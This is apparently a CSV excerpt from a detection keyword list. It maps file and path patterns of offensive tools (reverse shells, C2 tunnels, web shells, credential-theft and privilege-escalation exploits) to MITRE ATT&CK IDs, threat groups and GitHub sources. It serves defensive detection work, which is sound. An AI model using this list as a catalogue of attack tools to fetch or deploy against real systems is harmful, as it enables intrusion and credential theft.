"*/reverse-ssh-armv7-x86*",".{0,1000}\/reverse\-ssh\-armv7\-x86.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10446"
"*/reverse-ssh-armv8-x64*",".{0,1000}\/reverse\-ssh\-armv8\-x64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10447"
"*/reverse-sshx64*",".{0,1000}\/reverse\-sshx64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","10448"
"*/reversetcp.py*",".{0,1000}\/reversetcp\.py.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","10449"
"*/ReverseTCPShell*",".{0,1000}\/ReverseTCPShell.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","10450"
"*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10454"
"*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","10455"
"*/RevlCmd.dll*",".{0,1000}\/RevlCmd\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10456"
"*/Rev-Shell.git*",".{0,1000}\/Rev\-Shell\.git.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","10458"
"*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","10459"
"*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10460"
"*/revshell.py*",".{0,1000}\/revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","10461"
"*/revshell32.bin*",".{0,1000}\/revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","10462"
"*/revshell64.bin*",".{0,1000}\/revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","10463"
"*/revshells.com*",".{0,1000}\/revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","10464"
"*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","10465"
"*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","10466"
"*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","10467"
"*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","10468"
"*/rexec-brute.nse*",".{0,1000}\/rexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10469"
"*/rfc868-time.nse*",".{0,1000}\/rfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10470"
"*/rfs_injection.exe*",".{0,1000}\/rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10471"
"*/RGPerson.py*",".{0,1000}\/RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","10473"
"*/riak-http-info.nse*",".{0,1000}\/riak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10474"
"*/ricardojba/Invoke-noPac*",".{0,1000}\/ricardojba\/Invoke\-noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","N/A","1","62","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z","10475"
"*/ricardojba/noPac*",".{0,1000}\/ricardojba\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","1","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","10476"
"*/rid_hijack.*",".{0,1000}\/rid_hijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10477"
"*/rid_hijack.py*",".{0,1000}\/rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","10478"
"*/ridenum/ridenum.py*",".{0,1000}\/ridenum\/ridenum\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10479"
"*/RID-Hijacking.git*",".{0,1000}\/RID\-Hijacking\.git.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","10480"
"*/Ridter/noPac*",".{0,1000}\/Ridter\/noPac.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","1","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","10481"
"*/RITM.git*",".{0,1000}\/RITM\.git.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","10482"
"*/rlogin-brute.nse*",".{0,1000}\/rlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10483"
"*/rm_injection.exe*",".{0,1000}\/rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10484"
"*/rmi-dumpregistry.nse*",".{0,1000}\/rmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10485"
"*/rmi-vuln-classloader.nse*",".{0,1000}\/rmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10486"
"*/ROADToken.exe*",".{0,1000}\/ROADToken\.exe.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","10489"
"*/ROADtoken.git*",".{0,1000}\/ROADtoken\.git.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","10490"
"*/ROADtools/*",".{0,1000}\/ROADtools\/.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","10491"
"*/roaster.py*",".{0,1000}\/roaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#linux","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","10492"
"*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10493"
"*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10494"
"*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10495"
"*/RoguePotato.git*",".{0,1000}\/RoguePotato\.git.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","10496"
"*/RogueWinRM.git*",".{0,1000}\/RogueWinRM\.git.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","10497"
"*/RogueWinRMdll*",".{0,1000}\/RogueWinRMdll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10498"
"*/RogueWinRMexe*",".{0,1000}\/RogueWinRMexe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10499"
"*/root/.gs_with_tor*",".{0,1000}\/root\/\.gs_with_tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10500"
"*/root/.local/bin/spraycharles*",".{0,1000}\/root\/\.local\/bin\/spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","10501"
"*/root/.mozilla/firefox/*.Exegol*",".{0,1000}\/root\/\.mozilla\/firefox\/.{0,1000}\.Exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10502"
"*/root/dns2tcp*",".{0,1000}\/root\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","10503"
"*/root/lsarelayx*",".{0,1000}\/root\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","#linux","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","10505"
"*/root/output/ratchatPT*",".{0,1000}\/root\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","#linux","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10506"
"*/root/shellcode.c*",".{0,1000}\/root\/shellcode\.c.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10507"
"*/root/shellcode.cpp*",".{0,1000}\/root\/shellcode\.cpp.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10508"
"*/root/shellcode.exe*",".{0,1000}\/root\/shellcode\.exe.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10509"
"*/root/viper/*",".{0,1000}\/root\/viper\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","10511"
"*/root/viper/dist*",".{0,1000}\/root\/viper\/dist.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","10512"
"*/rootkit.dll*",".{0,1000}\/rootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10513"
